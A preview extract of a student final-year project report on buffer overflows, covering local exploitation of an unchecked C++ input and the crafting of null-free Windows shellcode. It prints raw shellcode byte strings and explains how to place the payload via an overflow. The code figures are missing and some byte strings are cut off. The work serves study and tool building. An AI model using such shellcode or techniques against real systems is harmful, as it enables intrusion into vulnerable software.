












Study with the several resources on Docsity
Earn points by helping other students or get them with a premium plan
Prepare for your exams
Study with the several resources on Docsity
Earn points to download
Earn points by helping other students or get them with a premium plan
This report is for final year project to complete degree in Computer Science. It emphasis on Applications of Computer Sciences. It was supervised by Dr. Abhisri Yashwant at Bengal Engineering and Science University. Its main points are: Buffer, Overflows, Literature, Review, Register, Memory, Addressing, Architecture, Experimenting, Hardware
Typology: Study Guides, Projects, Research
1 / 20
This page cannot be seen from the preview
Don't miss anything!













iii
For this project the given schedule was adopted and still is being implemented:
Time Line Activities 6 th^ mid- 6 th^ final Selection of this project. 6 th^ final- 7 th^ mid Literature review and performing simple buffer overflow locally. 7 th^ mid - 7 thfinal Literature review and performing complex buffer overflow locally. 7 th^ final- 8 thfinal Literature review and performing complex buffer overflow remotely.
iv
A great problem in the field of software development is being faced by software developers and that is buffer overflow. Due to buffer overflow a large number of software lost their security. So in this project what I am going to do is to develop a tool that will help ease developers by finding buffer overflows (on a small scale). So for this tool first I am going to learn different aspects of buffer overflows and then make a tool that simulates me. So I am hopeful that at the end of this project I will be capable of testing different software for buffer overflow venerability and at most a tool will be developed that will be capable of performing tests for buffer overflow.
an increasing or decreasing rate. One factor may be that it is increasingly difficult to define and document vulnerabilities.
To understand the importance of the fact that why buffer overflows should be kept in sight as compared to other vulnerabilities, a few from the infinite list of Buffer Overflow vulnerabilities are given in the following urls: http://sunsolve.sun.com/search/document.do?assetkey=1-26-101512- http://seer.support.veritas.com/docs/279553.htm http://www.derkeiler.com/Mailing-Lists/Securiteam/2004-10/0063.html http://research.eeye.com/html/advisories/published/AD20031111.html http://xforce.iss.net/xforce/alerts/id/ http://www.nsfocus.com/en/advisories/0608.html http://www.symantec.com/security_response/vulnerability.jsp?bid=2002.02. http://marc.info/?l=bugtraq&m=106859247713009&w= http://securityresponse.symantec.com/avcenter/security/Content/6122.html http://securityresponse.symantec.com/avcenter/security/Content/10708.html http://research.eeye.com/html/advisories/published/AD20060421.html http://lwn.net/Articles/151617/ http://artofhacking.com/tucops/hack/winnet/live/aoh_B06-4437.HTM
All the work done is in accordance with the time line. Previously a literature survey was performed and a simple local buffer over flow was conducted, in that a program was illegally accessed was gained. This was because that program was using the standard library of C++; in the standard library the function used was “cin”. This “cin” function was the cause of the buffer overflow vulnerability, it has no size check on the input and there for any type and any sized string can be inputted to this function.
Understanding shell code. Making simple assembly code. Making simple shell code. Making complex shell code. Using complex shell code. Making self sustained shell codes.
Shell code is the name given to small pieces of assembly language which are used to launch shells, typically as a result of a buffer overflow. Shellcode may be used as an exploit payload, providing a cracker with, typically, command line access to a computer system with the privileges of the process that has been exploited. Shellcodes can be stored in a process' memory space and subsequently executed as a result of the attacker gaining control of the program counter using vulnerabilities such as stack and heap-based buffer overflows, or format string attacks. There are various methods of controlling the program counter which vary between operating systems and processor architectures. They include but are not limited to: overwriting the return address in a stack frame, overwriting exception handlers and Windows-based shatter attacks. Since the commands that are put in the assembly are the numerical representatoins of the original commands thats why making a shell code is very very difficult because of that fact that there cant be “00” in it, and due to that its assembly code incrteases in size by three times. A sample shell code is stated below: char shellcode[] = “\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8a” “\xd4\xf2\xe7\x83\xeb\xfc\xe2\xf4\xbb\x0f\xa1\xa4\xd9\xbe\xf0\x8d” “\xec\x8c\x6b\x6e\x6b\x19\x72\x71\xc9\x86\x94\x8f\x9b\x88\x94\xb4” “\x03\x35\x98\x81\xd2\x84\xa3\xb1\x03\x35\x3f\x67\x3a\xb2\x23\x04” “\x47\x54\xa0\xb5\xdc\x97\x7b\x06\x3a\xb2\x3f\x67\x19\xbe\xf0\xbe”
Figure 1, Assembly code with output.
As mentioned above that a shell code can’t have “00” in it that’s why the above assembly code can’t be used for the sake of shell code. Instead we will modify this assembly code so that it could be used for the sake of shell code. To remove all the “00” what we will do is that we will add “1111111” with them and then subtract the same value in the code and the required shell code could be made. For example let’s do this for the first line: After adding 1111111 with 401210 in hex format we get 1512321, so MOV EBX, 1512321 SUB EBX, 1111111 PUSH EBX
This is the same as simply pushing 401210 but we have removed “00” from their machine representation, though the size has increased three times. Now the completely transformed code is shown below with the results from where the difference between simple assembly code and shell code will become prominent:
Figure 2, Conversion to shell code.
To remove the “push 0” statement, the ECX register was nullified by using xor command. Then instead of pushing 0, ECX register was pushed due to which same result was obtained with different code. A successful shell code is obtained in this fashion. There is no single “00” in its numerical representation of the commands. Now to complete the transformation what we have to do is simply copy all this and select only the numeric representation from the code. After selecting the numerical commands we get: BB2123510181EB1111110153E8A022A97733C951535351E8202FA
After taking this address we simply subtract this address by the base address of “User32”. So in the end the address that we get is: 28CAE. There for the final shell code that we can use is:
Figure 4, Complex shell code.
So the final shell code that we got is: \xBB\x21\x23\x51\x01\x81\xEB\x11\x11\x11\x01\x53\xE8\xE1\x6D\xDA\x77\x33\xC9
x51\x53\x53\x51\x05\xBF\x9D\x13\x01\x2D\x11\x11\x11\x01\xFF\xD
After making a complex shell code that has the same type of addressing as of Windows operating system, we will make a C++ program that uses the shell code in order to display the message box:
Figure 5, The C++ code that will run the shell code.
This C++ code which carries the shell code will run the shell code when the input for the variable var1 is such that buffer overflow occurs and the instruction pointer pointed towards the memory location staring the shell code. For this purpose the following input is placed into the variable var1:
This code will be performing the same task as that of the above shell codes did but the difference will be that this code will be self sufficient as it will deduct its address and changing itself. Presently this code is going to be tested locally though it is intended for remote host. So to simulate such a scenario that is similar to that of a remote host, a program “cm.exe” will call a program “new.exe” and will send it data and in our case that data will be containing this shell code. The platform on which the programs are executed is Windows XP. The program that will accept the shell code is:
Figure 7, Code of new.exe.
This program will only take the argument when it is going to be invoked. What it will be doing is that it will only be showing that input and storing it in its internal buffer.
The code that will be sending the shell code in its data is:
Figure 8, Code of cm.exe.
What we can see in the above code is that a lot of junk is being sent along with the shell code. This is because the buffer at the other side is of a size 84 but our shell code is very
As scheduled, till the end of this semester a remote buffer overflow exploit code will be made. Presently the shell code that will be sent is made, because this is a self sufficient code and is capable of working remotely. The only thing that is left is making a remote connection and sending this code. So for this purpose network programming will be studied and performed. With network programming this shell code will be sent to a program containing buffer overflow vulnerability. This is a tuff job in such a small time but I pray for Allah that he helps me through this project.
[2] OllyDbg v1.10, Oleh Yuschuk, Intro,(2004)